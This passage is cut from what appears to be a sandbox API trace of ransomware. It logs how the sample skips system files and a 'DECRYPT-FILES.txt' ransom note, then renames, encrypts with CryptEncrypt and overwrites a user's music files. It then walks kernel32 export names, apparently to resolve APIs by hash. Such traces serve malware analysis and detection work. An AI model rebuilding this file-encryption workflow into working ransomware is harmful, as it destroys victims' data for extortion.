(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\lrbzvj2te9u.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav.3aZDcm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\lrbzvj2te9u.wav.3azdcm"), dwFlags=0x0) returned 1 [0085.553] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.553] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.553] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.554] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7d68370, ftCreationTime.dwHighDateTime=0x1d4c75c, ftLastAccessTime.dwLowDateTime=0x96e9c720, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0x96e9c720, ftLastWriteTime.dwHighDateTime=0x1d4ceb6, nFileSizeHigh=0x0, nFileSizeLow=0x8e29, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabxmQAtp.mp3", cAlternateFileName="TABXMQ~1.MP3")) returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="autorun.inf") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="boot.ini") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="desktop.ini") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="ntuser.dat") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="iconcache.db") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="bootsect.bak") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="ntuser.dat.log") returned 1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="thumbs.db") returned -1 [0085.554] lstrcmpiW (lpString1="TabxmQAtp.mp3", lpString2="Bootfont.bin") returned 1 [0085.554] lstrlenW (lpString="TabxmQAtp.mp3") returned 13 [0085.554] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.554] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.554] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.554] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0085.554] lstrlenW (lpString="TabxmQAtp.mp3") returned 13 [0085.554] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0085.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="TabxmQAtp.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3" [0085.554] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\tabxmqatp.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.555] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=36393) returned 1 [0085.555] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.555] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.555] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.555] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.555] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.555] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.555] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.556] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.556] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.557] CloseHandle (hObject=0x43c) returned 1 [0085.557] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.557] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.558] CloseHandle (hObject=0x0) returned 0 [0085.558] CloseHandle (hObject=0x438) returned 1 [0085.558] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.558] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.558] GetTickCount () returned 0x114dd84 [0085.558] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.559] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.559] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.559] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.559] lstrlenA (lpString="kernel32.dll") returned 12 [0085.559] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.559] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.559] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.559] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.559] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.559] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.560] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.560] lstrlenA (lpString="ADDATOMA") returned 8 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.560] lstrlenA (lpString="ADDATOMW") returned 8 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.560] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.560] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.560] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.560] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.560] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.560] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.560] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.560] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.560] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.560] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.560] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.560] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.560] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.560] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.560] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.560] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.561] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.561] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.561] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.561] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.561] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.561] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.561] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.561] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.561] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.561] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.561] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.561] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.561] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.561] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.561] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.561] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.561] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.561] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.561] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.561] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.562] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.562] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.562] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.562] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.562] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.562] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.562] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.562] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.562] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.562] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.562] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.562] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.562] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.562] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.562] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.562] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.562] lstrlenA (lpString="BEEP") returned 4 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.563] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.563] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.563] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.563] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.563] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.563] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.563] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.563] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.563] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.563] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.563] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.563] lstrlenA (lpString="CANCELIO") returned 8 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.563] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.563] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.563] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.563] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.563] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.563] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.563] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.564] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.564] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.564] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.564] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.564] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.564] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.564] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.564] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.564] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.564] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.564] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.564] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.564] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.564] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.564] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.564] lstrlenA 